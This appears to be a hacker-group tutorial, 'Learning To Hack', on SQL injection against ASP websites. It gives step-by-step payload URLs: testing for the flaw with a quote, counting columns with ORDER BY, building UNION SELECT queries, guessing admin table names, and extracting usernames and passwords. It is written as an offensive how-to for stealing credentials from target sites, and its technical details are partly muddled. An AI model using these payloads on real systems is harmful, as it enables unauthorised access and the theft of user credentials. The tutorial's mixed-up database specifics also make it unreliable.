Learning To Hack

MsSQL Structured Query Language Injection

Tutorial provided by

PAKbugs™

The SQL Injection on ASP is same as on PHP...but a little bit of changes are made...

So first of all we will find some site that is vulnerable and is on .asp

So assume that u got a site with the name of

Code:

http://www.target.com/

Now find page where the site is vulnerable to SQL Injection...

You can check the vulnerability by adding single quotation ' 

at the end of URL like

Code:

http://www.target.com/product.asp?id=13'

If u get this error...

Code:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'department_id=1024''.

/deptdet.asp, line 122

Then this means the site is vul to sql injections...Now we are going to find the columns in it...Normally we use -- at the end of string but in this case we will be using #

Code:

http://www.target.com/product.asp?id=13 order by 1#

Suppose that the site has 10 columns...when you will use the query "order by 1#" (without double quotations)

You will not get any error...the page will load normally...but when you will use the query "order by 11#" (without double quotations) you will get an error this means that the site has 10 columns...

So we will have an error on this query

Code:

http://www.target.com/product.asp?id=13 order by 11#

But when we will use this query, we will not get any error

Code:

http://www.target.com/product.asp?id=13 order by 10#

This tells us that the table has 10 columns

Now we will write the query as...

Code:

http://www.target.com/product.asp?id=13 union select 1,2,3,4,5,6,7,8,9,10#

So now in next step we need name of a table to get number of largets visible column from all .. let me explain bit , like in simple sql injection we use union select 1,2,3,4,5,6 -- and we get a number to get information from site , in this we need a table name to get that number of visible column ,

So to get that number we are going to add name of table after union select 1,2,3,4,5,6,7, ..,10

In this scripts of getting table names dont work most times i tried some of them so we will add name of tables manually normally name of tables are " admin,tbladmin,tbl_admin,user,users,login,info,email" etc . Suppose in the site we got admin table that is visible. Now our url will look like:

Code:

http://www.target.com/product.asp?id=13 union select 1,2,3,4,5,6,7,8,9,10 from admin#

After this we will get number of largest visible column which we can use to get data from site. Suppose we got 3,7and 6 columns that are visible...

So now we are going to use 3 to get information now all we have to do is just put the name of column instead of 3 in string and we will get username and password ,

Now our URL will look like

Code:

http://www.target.com/product.asp?id=13 union select 1,2,name,4,5,6,7,8,9,10 from admin#

Suppose we got a username instead of the number 3.

and then change column name with passwords column name

you will get the password ;)

URL will be like

Code:

http://www.target.com/product.asp?id=13 union select 1,2,passwords,4,5,6,7,8,9,10 from admin#